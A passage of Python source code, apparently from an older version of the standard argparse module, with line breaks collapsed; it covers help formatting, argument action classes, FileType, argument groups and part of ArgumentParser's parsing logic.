_re.compile(r'\n\n\n+') # =============================== # Section and indentation methods # =============================== def _indent(self): self._current_indent += self._indent_increment self._level += 1 def _dedent(self): self._current_indent -= self._indent_increment assert self._current_indent >= 0, 'Indent decreased below 0.' self._level -= 1 class _Section(object): def __init__(self, formatter, parent, heading=None): self.formatter = formatter self.parent = parent self.heading = heading self.items = [] def format_help(self): # format the indented section if self.parent is not None: self.formatter._indent() join = self.formatter._join_parts for func, args in self.items: func(*args) item_help = join([func(*args) for func, args in self.items]) if self.parent is not None: self.formatter._dedent() # return nothing if the section was empty if not item_help: return '' # add the heading if the section was non-empty if self.heading is not SUPPRESS and self.heading is not None: current_indent = self.formatter._current_indent heading = '%*s%s:\n' % (current_indent, '', self.heading) else: heading = '' # join the section-initial newline, the heading and the help return join(['\n', heading, item_help, '\n']) def _add_item(self, func, args): self._current_section.items.append((func, args)) # ======================== # Message building methods # ======================== def start_section(self, heading): self._indent() section = self._Section(self, self._current_section, heading) self._add_item(section.format_help, []) self._current_section = section def end_section(self): self._current_section = self._current_section.parent self._dedent() def add_text(self, text): if text is not SUPPRESS and text is not None: self._add_item(self._format_text, [text]) def add_usage(self, usage, actions, groups, prefix=None): if usage is not SUPPRESS: args = usage, actions, groups, prefix self._add_item(self._format_usage, args) def add_argument(self, action): if action.help is not SUPPRESS: # find all invocations get_invocation = self._format_action_invocation invocations = [get_invocation(action)] for subaction in self._iter_indented_subactions(action): invocations.append(get_invocation(subaction)) # update the maximum item length invocation_length = max([len(s) for s in invocations]) action_length = invocation_length + self._current_indent self._action_max_length = max(self._action_max_length, action_length) # add the item to the list self._add_item(self._format_action, [action]) def add_arguments(self, actions): for action in actions: self.add_argument(action) # ======================= # Help-formatting methods # ======================= def format_help(self): help = self._root_section.format_help() if help: help = self._long_break_matcher.sub('\n\n', help) help = help.strip('\n') + '\n' return help def _join_parts(self, part_strings): return ''.join([part for part in part_strings if part and part is not SUPPRESS]) def _format_usage(self, usage, actions, groups, prefix): if prefix is None: prefix = _('usage: ') # if usage is specified, use that if usage is not None: usage = usage % dict(prog=self._prog) # if no optionals or positionals are available, usage is just prog elif usage is None and not actions: usage = '%(prog)s' % dict(prog=self._prog) # if optionals and positionals are available, calculate usage elif usage is None: prog = '%(prog)s' % dict(prog=self._prog) # split optionals from positionals optionals = [] positionals = [] for action in actions: if action.option_strings: optionals.append(action) else: positionals.append(action) # build full usage string format = self._format_actions_usage action_usage = format(optionals + positionals, groups) usage = ' '.join([s for s in [prog, action_usage] if s]) # wrap the usage parts if it's too long text_width = self._width - self._current_indent if len(prefix) + len(usage) > text_width: # break usage into wrappable parts part_regexp = r'\(.*?\)+|\[.*?\]+|\S+' opt_usage = format(optionals, groups) pos_usage = format(positionals, groups) opt_parts = _re.findall(part_regexp, opt_usage) pos_parts = _re.findall(part_regexp, pos_usage) assert ' '.join(opt_parts) == opt_usage assert ' '.join(pos_parts) == pos_usage # helper for wrapping lines def get_lines(parts, indent, prefix=None): lines = [] line = [] if prefix is not None: line_len = len(prefix) - 1 else: line_len = len(indent) - 1 for part in parts: if line_len + 1 + len(part) > text_width: lines.append(indent + ' '.join(line)) line = [] line_len = len(indent) - 1 line.append(part) line_len += len(part) + 1 if line: lines.append(indent + ' '.join(line)) if prefix is not None: lines[0] = lines[0][len(indent):] return lines # if prog is short, follow it with optionals or positionals if len(prefix) + len(prog) <= 0.75 * text_width: indent = ' ' * (len(prefix) + len(prog) + 1) if opt_parts: lines = get_lines([prog] + opt_parts, indent, prefix) lines.extend(get_lines(pos_parts, indent)) elif pos_parts: lines = get_lines([prog] + pos_parts, indent, prefix) else: lines = [prog] # if prog is long, put it on its own line else: indent = ' ' * len(prefix) parts = opt_parts + pos_parts lines = get_lines(parts, indent) if len(lines) > 1: lines = [] lines.extend(get_lines(opt_parts, indent)) lines.extend(get_lines(pos_parts, indent)) lines = [prog] + lines # join lines into usage usage = '\n'.join(lines) # prefix with 'usage:' return '%s%s\n\n' % (prefix, usage) def _format_actions_usage(self, actions, groups): # find group indices and identify actions in groups group_actions = set() inserts = {} for group in groups: try: start = actions.index(group._group_actions[0]) except ValueError: continue else: end = start + len(group._group_actions) if actions[start:end] == group._group_actions: for action in group._group_actions: group_actions.add(action) if not group.required: if start in inserts: inserts[start] += ' [' else: inserts[start] = '[' inserts[end] = ']' else: if start in inserts: inserts[start] += ' (' else: inserts[start] = '(' inserts[end] = ')' for i in range(start + 1, end): inserts[i] = '|' # collect all actions format strings parts = [] for i, action in enumerate(actions): # suppressed arguments are marked with None # remove | separators for suppressed arguments if action.help is SUPPRESS: parts.append(None) if inserts.get(i) == '|': inserts.pop(i) elif inserts.get(i + 1) == '|': inserts.pop(i + 1) # produce all arg strings elif not action.option_strings: part = self._format_args(action, action.dest) # if it's in a group, strip the outer [] if action in group_actions: if part[0] == '[' and part[-1] == ']': part = part[1:-1] # add the action string to the list parts.append(part) # produce the first way to invoke the option in brackets else: option_string = action.option_strings[0] # if the Optional doesn't take a value, format is: # -s or --long if action.nargs == 0: part = '%s' % option_string # if the Optional takes a value, format is: # -s ARGS or --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) part = '%s %s' % (option_string, args_string) # make it look optional if it's not required or in a group if not action.required and action not in group_actions: part = '[%s]' % part # add the action string to the list parts.append(part) # insert things at the necessary indices for i in sorted(inserts, reverse=True): parts[i:i] = [inserts[i]] # join all the action items with spaces text = ' '.join([item for item in parts if item is not None]) # clean up separators for mutually exclusive groups open = r'[\[(]' close = r'[\])]' text = _re.sub(r'(%s) ' % open, r'\1', text) text = _re.sub(r' (%s)' % close, r'\1', text) text = _re.sub(r'%s *%s' % (open, close), r'', text) text = _re.sub(r'\(([^|]*)\)', r'\1', text) text = text.strip() # return the text return text def _format_text(self, text): if '%(prog)' in text: text = text % dict(prog=self._prog) text_width = self._width - self._current_indent indent = ' ' * self._current_indent return self._fill_text(text, text_width, indent) + '\n\n' def _format_action(self, action): # determine the required width and the entry label help_position = min(self._action_max_length + 2, self._max_help_position) help_width = self._width - help_position action_width = help_position - self._current_indent - 2 action_header = self._format_action_invocation(action) # ho nelp; start on same line and add a final newline if not action.help: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup # short action name; start on the same line and pad two spaces elif len(action_header) <= action_width: tup = self._current_indent, '', action_width, action_header action_header = '%*s%-*s ' % tup indent_first = 0 # long action name; start on the next line else: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup indent_first = help_position # collect the pieces of the action help parts = [action_header] # if there was help for the action, add lines of help text if action.help: help_text = self._expand_help(action) help_lines = self._split_lines(help_text, help_width) parts.append('%*s%s\n' % (indent_first, '', help_lines[0])) for line in help_lines[1:]: parts.append('%*s%s\n' % (help_position, '', line)) # or add a newline if the description doesn't end with one elif not action_header.endswith('\n'): parts.append('\n') # if there are any sub-actions, add their help as well for subaction in self._iter_indented_subactions(action): parts.append(self._format_action(subaction)) # return a single string return self._join_parts(parts) def _format_action_invocation(self, action): if not action.option_strings: metavar, = self._metavar_formatter(action, action.dest)(1) return metavar else: parts = [] # if the Optional doesn't take a value, format is: # -s, --long if action.nargs == 0: parts.extend(action.option_strings) # if the Optional takes a value, format is: # -s ARGS, --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) for option_string in action.option_strings: parts.append('%s %s' % (option_string, args_string)) return ', '.join(parts) def _metavar_formatter(self, action, default_metavar): if action.metavar is not None: result = action.metavar elif action.choices is not None: choice_strs = [str(choice) for choice in action.choices] result = '{%s}' % ','.join(choice_strs) else: result = default_metavar def format(tuple_size): if isinstance(result, tuple): return result else: return (result, ) * tuple_size return format def _format_args(self, action, default_metavar): get_metavar = self._metavar_formatter(action, default_metavar) if action.nargs is None: result = '%s' % get_metavar(1) elif action.nargs == OPTIONAL: result = '[%s]' % get_metavar(1) elif action.nargs == ZERO_OR_MORE: result = '[%s [%s ...]]' % get_metavar(2) elif action.nargs == ONE_OR_MORE: result = '%s [%s ...]' % get_metavar(2) elif action.nargs == REMAINDER: result = '...' elif action.nargs == PARSER: result = '%s ...' % get_metavar(1) else: formats = ['%s' for _ in range(action.nargs)] result = ' '.join(formats) % get_metavar(action.nargs) return result def _expand_help(self, action): params = dict(vars(action), prog=self._prog) for name in list(params): if params[name] is SUPPRESS: del params[name] for name in list(params): if hasattr(params[name], '__name__'): params[name] = params[name].__name__ if params.get('choices') is not None: choices_str = ', '.join([str(c) for c in params['choices']]) params['choices'] = choices_str return self._get_help_string(action) % params def _iter_indented_subactions(self, action): try: get_subactions = action._get_subactions except AttributeError: pass else: self._indent() for subaction in get_subactions(): yield subaction self._dedent() def _split_lines(self, text, width): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.wrap(text, width) def _fill_text(self, text, width, indent): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.fill(text, width, initial_indent=indent, subsequent_indent=indent) def _get_help_string(self, action): return action.help class RawDescriptionHelpFormatter(HelpFormatter): """Help message formatter which retains any formatting in descriptions. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _fill_text(self, text, width, indent): return ''.join([indent + line for line in text.splitlines(True)]) class RawTextHelpFormatter(RawDescriptionHelpFormatter): """Help message formatter which retains formatting of all help text. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _split_lines(self, text, width): return text.splitlines() class ArgumentDefaultsHelpFormatter(HelpFormatter): """Help message formatter which adds default values to argument help. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _get_help_string(self, action): help = action.help if '%(default)' not in action.help: if action.default is not SUPPRESS: defaulting_nargs = [OPTIONAL, ZERO_OR_MORE] if action.option_strings or action.nargs in defaulting_nargs: help += ' (default: %(default)s)' return help # ===================== # Options and Arguments # ===================== def _get_action_name(argument): if argument is None: return None elif argument.option_strings: return '/'.join(argument.option_strings) elif argument.metavar not in (None, SUPPRESS): return argument.metavar elif argument.dest not in (None, SUPPRESS): return argument.dest else: return None class ArgumentError(Exception): """An error from creating or using an argument (optional or positional). The string value of this exception is the message, augmented with information about the argument that caused it. """ def __init__(self, argument, message): self.argument_name = _get_action_name(argument) self.message = message def __str__(self): if self.argument_name is None: format = '%(message)s' else: format = 'argument %(argument_name)s: %(message)s' return format % dict(message=self.message, argument_name=self.argument_name) class ArgumentTypeError(Exception): """An error from trying to convert a command line string to a type.""" pass # ============== # Action classes # ============== class Action(_AttributeHolder): """Information about how to convert command line strings to Python objects. Action objects are used by an ArgumentParser to represent the information needed to parse a single argument from one or more strings from the command line. The keyword arguments to the Action constructor are also all attributes of Action instances. Keyword Arguments: - option_strings -- A list of command-line option strings which should be associated with this action. - dest -- The name of the attribute to hold the created object(s) - nargs -- The number of command-line arguments that should be consumed. By default, one argument will be consumed and a single value will be produced. Other values include: - N (an integer) consumes N arguments (and produces a list) - '?' consumes zero or one arguments - '*' consumes zero or more arguments (and produces a list) - '+' consumes one or more arguments (and produces a list) Note that the difference between the default and nargs=1 is that with the default, a single value will be produced, while with nargs=1, a list containing a single value will be produced. - const -- The value to be produced if the option is specified and the option uses an action that takes no values. - default -- The value to be produced if the option is not specified. - type -- The type which the command-line arguments should be converted to, should be one of 'string', 'int', 'float', 'complex' or a callable object that accepts a single string argument. If None, 'string' is assumed. - choices -- A container of values that should be allowed. If not None, after a command-line argument has been converted to the appropriate type, an exception will be raised if it is not a member of this collection. - required -- True if the action must always be specified at the command line. This is only meaningful for optional command-line arguments. - help -- The help string describing the argument. - metavar -- The name to be used for the option's argument with the help string. If None, the 'dest' value will be used as the name. """ def __init__(self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None): self.option_strings = option_strings self.dest = dest self.nargs = nargs self.const = const self.default = default self.type = type self.choices = choices self.required = required self.help = help self.metavar = metavar def _get_kwargs(self): names = [ 'option_strings', 'dest', 'nargs', 'const', 'default', 'type', 'choices', 'help', 'metavar', ] return [(name, getattr(self, name)) for name in names] def __call__(self, parser, namespace, values, option_string=None): raise NotImplementedError(_('.__call__() not defined')) class _StoreAction(Action): def __init__(self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None): if nargs == 0: raise ValueError('nargs for store actions must be > 0; if you ' 'have nothing to store, actions such as store ' 'true or store const may be more appropriate') if const is not None and nargs != OPTIONAL: raise ValueError('nargs must be %r to supply const' % OPTIONAL) super(_StoreAction, self).__init__( option_strings=option_strings, dest=dest, nargs=nargs, const=const, default=default, type=type, choices=choices, required=required, help=help, metavar=metavar) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, values) class _StoreConstAction(Action): def __init__(self, option_strings, dest, const, default=None, required=False, help=None, metavar=None): super(_StoreConstAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, const=const, default=default, required=required, help=help) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, self.const) class _StoreTrueAction(_StoreConstAction): def __init__(self, option_strings, dest, default=False, required=False, help=None): super(_StoreTrueAction, self).__init__( option_strings=option_strings, dest=dest, const=True, default=default, required=required, help=help) class _StoreFalseAction(_StoreConstAction): def __init__(self, option_strings, dest, default=True, required=False, help=None): super(_StoreFalseAction, self).__init__( option_strings=option_strings, dest=dest, const=False, default=default, required=required, help=help) class _AppendAction(Action): def __init__(self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None): if nargs == 0: raise ValueError('nargs for append actions must be > 0; if arg ' 'strings are not supplying the value to append, ' 'the append const action may be more appropriate') if const is not None and nargs != OPTIONAL: raise ValueError('nargs must be %r to supply const' % OPTIONAL) super(_AppendAction, self).__init__( option_strings=option_strings, dest=dest, nargs=nargs, const=const, default=default, type=type, choices=choices, required=required, help=help, metavar=metavar) def __call__(self, parser, namespace, values, option_string=None): items = _copy.copy(_ensure_value(namespace, self.dest, [])) items.append(values) setattr(namespace, self.dest, items) class _AppendConstAction(Action): def __init__(self, option_strings, dest, const, default=None, required=False, help=None, metavar=None): super(_AppendConstAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, const=const, default=default, required=required, help=help, metavar=metavar) def __call__(self, parser, namespace, values, option_string=None): items = _copy.copy(_ensure_value(namespace, self.dest, [])) items.append(self.const) setattr(namespace, self.dest, items) class _CountAction(Action): def __init__(self, option_strings, dest, default=None, required=False, help=None): super(_CountAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, default=default, required=required, help=help) def __call__(self, parser, namespace, values, option_string=None): new_count = _ensure_value(namespace, self.dest, 0) + 1 setattr(namespace, self.dest, new_count) class _HelpAction(Action): def __init__(self, option_strings, dest=SUPPRESS, default=SUPPRESS, help=None): super(_HelpAction, self).__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help) def __call__(self, parser, namespace, values, option_string=None): parser.print_help() parser.exit() class _VersionAction(Action): def __init__(self, option_strings, version=None, dest=SUPPRESS, default=SUPPRESS, help="show program's version number and exit"): super(_VersionAction, self).__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help) self.version = version def __call__(self, parser, namespace, values, option_string=None): version = self.version if version is None: version = parser.version formatter = parser._get_formatter() formatter.add_text(version) parser.exit(message=formatter.format_help()) class _SubParsersAction(Action): class _ChoicesPseudoAction(Action): def __init__(self, name, aliases, help): metavar = dest = name if aliases: metavar += ' (%s)' % ', '.join(aliases) sup = super(_SubParsersAction._ChoicesPseudoAction, self) sup.__init__(option_strings=[], dest=dest, help=help, metavar=metavar) def __init__(self, option_strings, prog, parser_class, dest=SUPPRESS, help=None, metavar=None): self._prog_prefix = prog self._parser_class = parser_class self._name_parser_map = {} self._choices_actions = [] super(_SubParsersAction, self).__init__( option_strings=option_strings, dest=dest, nargs=PARSER, choices=self._name_parser_map, help=help, metavar=metavar) def add_parser(self, name, **kwargs): # set prog from the existing prefix if kwargs.get('prog') is None: kwargs['prog'] = '%s %s' % (self._prog_prefix, name) aliases = kwargs.pop('aliases', ()) # create a pseudo-action to hold the choice help if 'help' in kwargs: help = kwargs.pop('help') choice_action = self._ChoicesPseudoAction(name, aliases, help) self._choices_actions.append(choice_action) # create the parser and add it to the map parser = self._parser_class(**kwargs) self._name_parser_map[name] = parser # make parser available under aliases also for alias in aliases: self._name_parser_map[alias] = parser return parser def _get_subactions(self): return self._choices_actions def __call__(self, parser, namespace, values, option_string=None): parser_name = values[0] arg_strings = values[1:] # set the parser name if requested if self.dest is not SUPPRESS: setattr(namespace, self.dest, parser_name) # select the parser try: parser = self._name_parser_map[parser_name] except KeyError: tup = parser_name, ', '.join(self._name_parser_map) msg = _('unknown parser %r (choices: %s)' % tup) raise ArgumentError(self, msg) # parse all the remaining options into the namespace # store any unrecognized options on the object, so that the top # level parser can decide what to do with them namespace, arg_strings = parser.parse_known_args(arg_strings, namespace) if arg_strings: vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, []) getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings) # ============== # Type classes # ============== class FileType(object): """Factory for creating file object types Instances of FileType are typically passed as type= arguments to the ArgumentParser add_argument() method. Keyword Arguments: - mode -- A string indicating how the file is to be opened. Accepts the same values as the builtin open() function. - bufsize -- The file's desired buffer size. Accepts the same values as the builtin open() function. """ def __init__(self, mode='r', bufsize=None): self._mode = mode self._bufsize = bufsize def __call__(self, string): # the special argument "-" means sys.std{in,out} if string == '-': if 'r' in self._mode: return _sys.stdin elif 'w' in self._mode: return _sys.stdout else: msg = _('argument "-" with mode %r' % self._mode) raise ValueError(msg) try: # all other arguments are used as file names if self._bufsize: return open(string, self._mode, self._bufsize) else: return open(string, self._mode) except IOError: err = _sys.exc_info()[1] message = _("can't open '%s': %s") raise ArgumentTypeError(message % (string, err)) def __repr__(self): args = [self._mode, self._bufsize] args_str = ', '.join([repr(arg) for arg in args if arg is not None]) return '%s(%s)' % (type(self).__name__, args_str) # =========================== # Optional and Positional Parsing # =========================== class Namespace(_AttributeHolder): """Simple object for storing attributes. Implements equality by attribute names and values, and provides a simple string representation. """ def __init__(self, **kwargs): for name in kwargs: setattr(self, name, kwargs[name]) __hash__ = None def __eq__(self, other): return vars(self) == vars(other) def __ne__(self, other): return not (self == other) def __contains__(self, key): return key in self.__dict__ class _ActionsContainer(object): def __init__(self, description, prefix_chars, argument_default, conflict_handler): super(_ActionsContainer, self).__init__() self.description = description self.argument_default = argument_default self.prefix_chars = prefix_chars self.conflict_handler = conflict_handler # set up registries self._registries = {} # register actions self.register('action', None, _StoreAction) self.register('action', 'store', _StoreAction) self.register('action', 'store_const', _StoreConstAction) self.register('action', 'store_true', _StoreTrueAction) self.register('action', 'store_false', _StoreFalseAction) self.register('action', 'append', _AppendAction) self.register('action', 'append_const', _AppendConstAction) self.register('action', 'count', _CountAction) self.register('action', 'help', _HelpAction) self.register('action', 'version', _VersionAction) self.register('action', 'parsers', _SubParsersAction) # raise an exception if the conflict handler is invalid self._get_handler() # action storage self._actions = [] self._option_string_actions = {} # groups self._action_groups = [] self._mutually_exclusive_groups = [] # defaults storage self._defaults = {} # determines whether an "option" looks like a negative number self._negative_number_matcher = _re.compile(r'^-\d+$|^-\d*\.\d+$') # whether or not there are any optionals that look like negative # numbers -- uses a list so it can be shared and edited self._has_negative_number_optionals = [] # ==================== # Registration methods # ==================== def register(self, registry_name, value, object): registry = self._registries.setdefault(registry_name, {}) registry[value] = object def _registry_get(self, registry_name, value, default=None): return self._registries[registry_name].get(value, default) # ================================== # Namespace default accessor methods # ================================== def set_defaults(self, **kwargs): self._defaults.update(kwargs) # if these defaults match any existing arguments, replace # the previous default on the object with the new one for action in self._actions: if action.dest in kwargs: action.default = kwargs[action.dest] def get_default(self, dest): for action in self._actions: if action.dest == dest and action.default is not None: return action.default return self._defaults.get(dest, None) # ======================= # Adding argument actions # ======================= def add_argument(self, *args, **kwargs): """ add_argument(dest, ..., name=value, ...) add_argument(option_string, option_string, ..., name=value, ...) """ # if no positional args are supplied or only one is supplied and # it doesn't look like an option string, parse a positional # argument chars = self.prefix_chars if not args or len(args) == 1 and args[0][0] not in chars: if args and 'dest' in kwargs: raise ValueError('dest supplied twice for positional argument') kwargs = self._get_positional_kwargs(*args, **kwargs) # otherwise, we're adding an optional argument else: kwargs = self._get_optional_kwargs(*args, **kwargs) # if no default was supplied, use the parser-level default if 'default' not in kwargs: dest = kwargs['dest'] if dest in self._defaults: kwargs['default'] = self._defaults[dest] elif self.argument_default is not None: kwargs['default'] = self.argument_default # create the action object, and add it to the parser action_class = self._pop_action_class(kwargs) if not _callable(action_class): raise ValueError('unknown action "%s"' % action_class) action = action_class(**kwargs) # raise an error if the action type is not callable type_func = self._registry_get('type', action.type, action.type) if not _callable(type_func): raise ValueError('%r is not callable' % type_func) return self._add_action(action) def add_argument_group(self, *args, **kwargs): group = _ArgumentGroup(self, *args, **kwargs) self._action_groups.append(group) return group def add_mutually_exclusive_group(self, **kwargs): group = _MutuallyExclusiveGroup(self, **kwargs) self._mutually_exclusive_groups.append(group) return group def _add_action(self, action): # resolve any conflicts self._check_conflict(action) # add to actions list self._actions.append(action) action.container = self # index the action by any option strings it has for option_string in action.option_strings: self._option_string_actions[option_string] = action # set the flag if any option strings look like negative numbers for option_string in action.option_strings: if self._negative_number_matcher.match(option_string): if not self._has_negative_number_optionals: self._has_negative_number_optionals.append(True) # return the created action return action def _remove_action(self, action): self._actions.remove(action) def _add_container_actions(self, container): # collect groups by titles title_group_map = {} for group in self._action_groups: if group.title in title_group_map: msg = _('cannot merge actions - two groups are named %r') raise ValueError(msg % (group.title)) title_group_map[group.title] = group # map each action to its group group_map = {} for group in container._action_groups: # if a group with the title exists, use that, otherwise # create a new group matching the container's group if group.title not in title_group_map: title_group_map[group.title] = self.add_argument_group( title=group.title, description=group.description, conflict_handler=group.conflict_handler) # map the actions to their new group for action in group._group_actions: group_map[action] = title_group_map[group.title] # add container's mutually exclusive groups # NOTE: if add_mutually_exclusive_group ever gains title= and # description= then this code will need to be expanded as above for group in container._mutually_exclusive_groups: mutex_group = self.add_mutually_exclusive_group( required=group.required) # map the actions to their new mutex group for action in group._group_actions: group_map[action] = mutex_group # add all actions to this container or their group for action in container._actions: group_map.get(action, self)._add_action(action) def _get_positional_kwargs(self, dest, **kwargs): # make sure required is not specified if 'required' in kwargs: msg = _("'required' is an invalid argument for positionals") raise TypeError(msg) # mark positional arguments as required if at least one is # always required if kwargs.get('nargs') not in [OPTIONAL, ZERO_OR_MORE]: kwargs['required'] = True if kwargs.get('nargs') == ZERO_OR_MORE and 'default' not in kwargs: kwargs['required'] = True # return the keyword arguments with no option strings return dict(kwargs, dest=dest, option_strings=[]) def _get_optional_kwargs(self, *args, **kwargs): # determine short and long option strings option_strings = [] long_option_strings = [] for option_string in args: # error on strings that don't start with an appropriate prefix if not option_string[0] in self.prefix_chars: msg = _('invalid option string %r: ' 'must start with a character %r') tup = option_string, self.prefix_chars raise ValueError(msg % tup) # strings starting with two prefix characters are long options option_strings.append(option_string) if option_string[0] in self.prefix_chars: if len(option_string) > 1: if option_string[1] in self.prefix_chars: long_option_strings.append(option_string) # infer destination, '--foo-bar' -> 'foo_bar' and '-x' -> 'x' dest = kwargs.pop('dest', None) if dest is None: if long_option_strings: dest_option_string = long_option_strings[0] else: dest_option_string = option_strings[0] dest = dest_option_string.lstrip(self.prefix_chars) if not dest: msg = _('dest= is required for options like %r') raise ValueError(msg % option_string) dest = dest.replace('-', '_') # return the updated keyword arguments return dict(kwargs, dest=dest, option_strings=option_strings) def _pop_action_class(self, kwargs, default=None): action = kwargs.pop('action', default) return self._registry_get('action', action, action) def _get_handler(self): # determine function from conflict handler string handler_func_name = '_handle_conflict_%s' % self.conflict_handler try: return getattr(self, handler_func_name) except AttributeError: msg = _('invalid conflict_resolution value: %r') raise ValueError(msg % self.conflict_handler) def _check_conflict(self, action): # find all options that conflict with this option confl_optionals = [] for option_string in action.option_strings: if option_string in self._option_string_actions: confl_optional = self._option_string_actions[option_string] confl_optionals.append((option_string, confl_optional)) # resolve any conflicts if confl_optionals: conflict_handler = self._get_handler() conflict_handler(action, confl_optionals) def _handle_conflict_error(self, action, conflicting_actions): message = _('conflicting option string(s): %s') conflict_string = ', '.join([option_string for option_string, action in conflicting_actions]) raise ArgumentError(action, message % conflict_string) def _handle_conflict_resolve(self, action, conflicting_actions): # remove all conflicting options for option_string, action in conflicting_actions: # remove the conflicting option action.option_strings.remove(option_string) self._option_string_actions.pop(option_string, None) # if the option now has no option string, remove it from the # container holding it if not action.option_strings: action.container._remove_action(action) class _ArgumentGroup(_ActionsContainer): def __init__(self, container, title=None, description=None, **kwargs): # add any missing keyword arguments by checking the container update = kwargs.setdefault update('conflict_handler', container.conflict_handler) update('prefix_chars', container.prefix_chars) update('argument_default', container.argument_default) super_init = super(_ArgumentGroup, self).__init__ super_init(description=description, **kwargs) # group attributes self.title = title self._group_actions = [] # share most attributes with the container self._registries = container._registries self._actions = container._actions self._option_string_actions = container._option_string_actions self._defaults = container._defaults self._has_negative_number_optionals = \ container._has_negative_number_optionals def _add_action(self, action): action = super(_ArgumentGroup, self)._add_action(action) self._group_actions.append(action) return action def _remove_action(self, action): super(_ArgumentGroup, self)._remove_action(action) self._group_actions.remove(action) class _MutuallyExclusiveGroup(_ArgumentGroup): def __init__(self, container, required=False): super(_MutuallyExclusiveGroup, self).__init__(container) self.required = required self._container = container def _add_action(self, action): if action.required: msg = _('mutually exclusive arguments must be optional') raise ValueError(msg) action = self._container._add_action(action) self._group_actions.append(action) return action def _remove_action(self, action): self._container._remove_action(action) self._group_actions.remove(action) class ArgumentParser(_AttributeHolder, _ActionsContainer): """Object for parsing command line strings into Python objects. Keyword Arguments: - prog -- The name of the program (default: sys.argv[0]) - usage -- A usage message (default: auto-generated from arguments) - description -- A description of what the program does - epilog -- Text following the argument descriptions - parents -- Parsers whose arguments should be copied into this one - formatter_class -- HelpFormatter class for printing help messages - prefix_chars -- Characters that prefix optional arguments - fromfile_prefix_chars -- Characters that prefix files containing additional arguments - argument_default -- The default value for all arguments - conflict_handler -- String indicating how to handle conflicts - add_help -- Add a -h/-help option """ def __init__(self, prog=None, usage=None, description=None, epilog=None, version=None, parents=[], formatter_class=HelpFormatter, prefix_chars='-', fromfile_prefix_chars=None, argument_default=None, conflict_handler='error', add_help=True): if version is not None: import warnings warnings.warn( """The "version" argument to ArgumentParser is deprecated. """ """Please use """ """"add_argument(..., action='version', version="N", ...)" """ """instead""", DeprecationWarning) superinit = super(ArgumentParser, self).__init__ superinit(description=description, prefix_chars=prefix_chars, argument_default=argument_default, conflict_handler=conflict_handler) # default setting for prog if prog is None: prog = _os.path.basename(_sys.argv[0]) self.prog = prog self.usage = usage self.epilog = epilog self.version = version self.formatter_class = formatter_class self.fromfile_prefix_chars = fromfile_prefix_chars self.add_help = add_help add_group = self.add_argument_group self._positionals = add_group(_('positional arguments')) self._optionals = add_group(_('optional arguments')) self._subparsers = None # register types def identity(string): return string self.register('type', None, identity) # add help and version arguments if necessary # (using explicit default to override global argument_default) if '-' in prefix_chars: default_prefix = '-' else: default_prefix = prefix_chars[0] if self.add_help: self.add_argument( default_prefix+'h', default_prefix*2+'help', action='help', default=SUPPRESS, help=_('show this help message and exit')) if self.version: self.add_argument( default_prefix+'v', default_prefix*2+'version', action='version', default=SUPPRESS, version=self.version, help=_("show program's version number and exit")) # add parent arguments and defaults for parent in parents: self._add_container_actions(parent) try: defaults = parent._defaults except AttributeError: pass else: self._defaults.update(defaults) # ======================= # Pretty __repr__ methods # ======================= def _get_kwargs(self): names = [ 'prog', 'usage', 'description', 'version', 'formatter_class', 'conflict_handler', 'add_help', ] return [(name, getattr(self, name)) for name in names] # ================================== # Optional/Positional adding methods # ================================== def add_subparsers(self, **kwargs): if self._subparsers is not None: self.error(_('cannot have multiple subparser arguments')) # add the parser class to the arguments if it's not present kwargs.setdefault('parser_class', type(self)) if 'title' in kwargs or 'description' in kwargs: title = _(kwargs.pop('title', 'subcommands')) description = _(kwargs.pop('description', None)) self._subparsers = self.add_argument_group(title, description) else: self._subparsers = self._positionals # prog defaults to the usage message of this parser, skipping # optional arguments and with no "usage:" prefix if kwargs.get('prog') is None: formatter = self._get_formatter() positionals = self._get_positional_actions() groups = self._mutually_exclusive_groups formatter.add_usage(self.usage, positionals, groups, '') kwargs['prog'] = formatter.format_help().strip() # create the parsers action and add it to the positionals list parsers_class = self._pop_action_class(kwargs, 'parsers') action = parsers_class(option_strings=[], **kwargs) self._subparsers._add_action(action) # return the created parsers action return action def _add_action(self, action): if action.option_strings: self._optionals._add_action(action) else: self._positionals._add_action(action) return action def _get_optional_actions(self): return [action for action in self._actions if action.option_strings] def _get_positional_actions(self): return [action for action in self._actions if not action.option_strings] # ===================================== # Command line argument parsing methods # ===================================== def parse_args(self, args=None, namespace=None): args, argv = self.parse_known_args(args, namespace) if argv: msg = _('unrecognized arguments: %s') self.error(msg % ' '.join(argv)) return args def parse_known_args(self, args=None, namespace=None): # args default to the system args if args is None: args = _sys.argv[1:] # default Namespace built from parser defaults if namespace is None: namespace = Namespace() # add any action defaults that aren't present for action in self._actions: if action.dest is not SUPPRESS: if not hasattr(namespace, action.dest): if action.default is not SUPPRESS: setattr(namespace, action.dest, action.default) # add any parser defaults that aren't present for dest in self._defaults: if not hasattr(namespace, dest): setattr(namespace, dest, self._defaults[dest]) # parse the arguments and exit if there are any errors try: namespace, args = self._parse_known_args(args, namespace) if hasattr(namespace, _UNRECOGNIZED_ARGS_ATTR): args.extend(getattr(namespace, _UNRECOGNIZED_ARGS_ATTR)) delattr(namespace, _UNRECOGNIZED_ARGS_ATTR) return namespace, args except ArgumentError: err = _sys.exc_info()[1] self.error(str(err)) def _parse_known_args(self, arg_strings, namespace): # replace arg strings that are file references if self.fromfile_prefix_chars is not None: 